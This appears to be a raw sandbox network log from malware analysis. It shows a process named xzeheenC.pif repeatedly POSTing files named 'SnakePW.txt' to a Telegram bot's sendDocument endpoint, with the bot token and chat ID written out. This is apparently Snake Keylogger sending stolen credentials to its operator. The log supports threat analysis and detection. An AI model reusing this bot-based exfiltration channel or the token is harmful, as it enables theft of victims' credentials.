2024-12-18 15:17:57 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418860,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535077,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49919 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:58 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd208e2eaa00de
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:17:58 UTC | 535 | OUT
Data Ascii:
--------------------------8dd208e2eaa00de
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:17:05
Client IP:
2024-12-18 15:17:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:59 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:59 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418866,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535079,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49920 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:58 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20af00185e1e
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:17:58 UTC | 535 | OUT
Data Ascii:
--------------------------8dd20af00185e1e
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:17:00
Client IP:
2024-12-18 15:17:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:59 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:59 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418868,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535079,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49921 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:17:59 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd214ffb664a86
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:17:59 UTC | 535 | OUT
Data Ascii:
--------------------------8dd214ffb664a86
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:16:48
Client IP:
2024-12-18 15:17:59 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:17:59 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:17:59 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418869,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535079,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49926 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:00 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20a77e51f755
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:00 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd20a77e51f755Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:01 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:01 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418873,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535081,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49928 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:00 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20c4261497b1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:00 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd20c4261497b1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:01 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 517
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:01 UTC | 517 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418875,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535081,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49929 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:01 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd216ef987af00
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:01 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd216ef987af00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:01 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:01 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418876,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535081,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49934 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:02 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20be100b0715
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:02 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd20be100b0715Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:03 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418880,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535083,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 49936 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:02 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20d938fe0172
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:02 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd20d938fe0172Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:03 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418882,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535083,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49937 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:03 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd218ddbcb8c7b
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:03 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd218ddbcb8c7bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:03 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:03 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:03 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418884,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535083,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49941 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:04 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20d7324cb693
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:04 UTC | 535 | OUT | Data Ascii: --------------------------8dd20d7324cb693Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:05 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:05 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418886,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535085,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49943 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:04 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20ef893a5471
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:04 UTC | 535 | OUT | Data Ascii: --------------------------8dd20ef893a5471Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:05 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:05 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418888,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535085,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49944 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:05 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21b3074f62f3
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:05 UTC | 535 | OUT | Data Ascii: --------------------------8dd21b3074f62f3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:05 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:05 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418889,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535085,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49949 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:06 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd20ed9b305c5d
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:06 UTC | 535 | OUT | Data Ascii: --------------------------8dd20ed9b305c5dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:07 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:07 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418892,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535087,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49950 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:06 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd210716015f06
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:06 UTC | 535 | OUT | Data Ascii: --------------------------8dd210716015f06Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:07 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:07 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418894,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535087,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49952 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:06 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21d585647a82
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:06 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd21d585647a82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:07 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:07 UTC | 515 | IN
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418895,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535087,"documen


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      45 | 192.168.2.5 | 49958 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-18 15:18:09 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd210a7f89af93
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:09 UTC | 535 | OUT
                                                                                                                      Data Ascii: --------------------------8dd210a7f89af93Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:09 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:09 UTC | 515 | IN
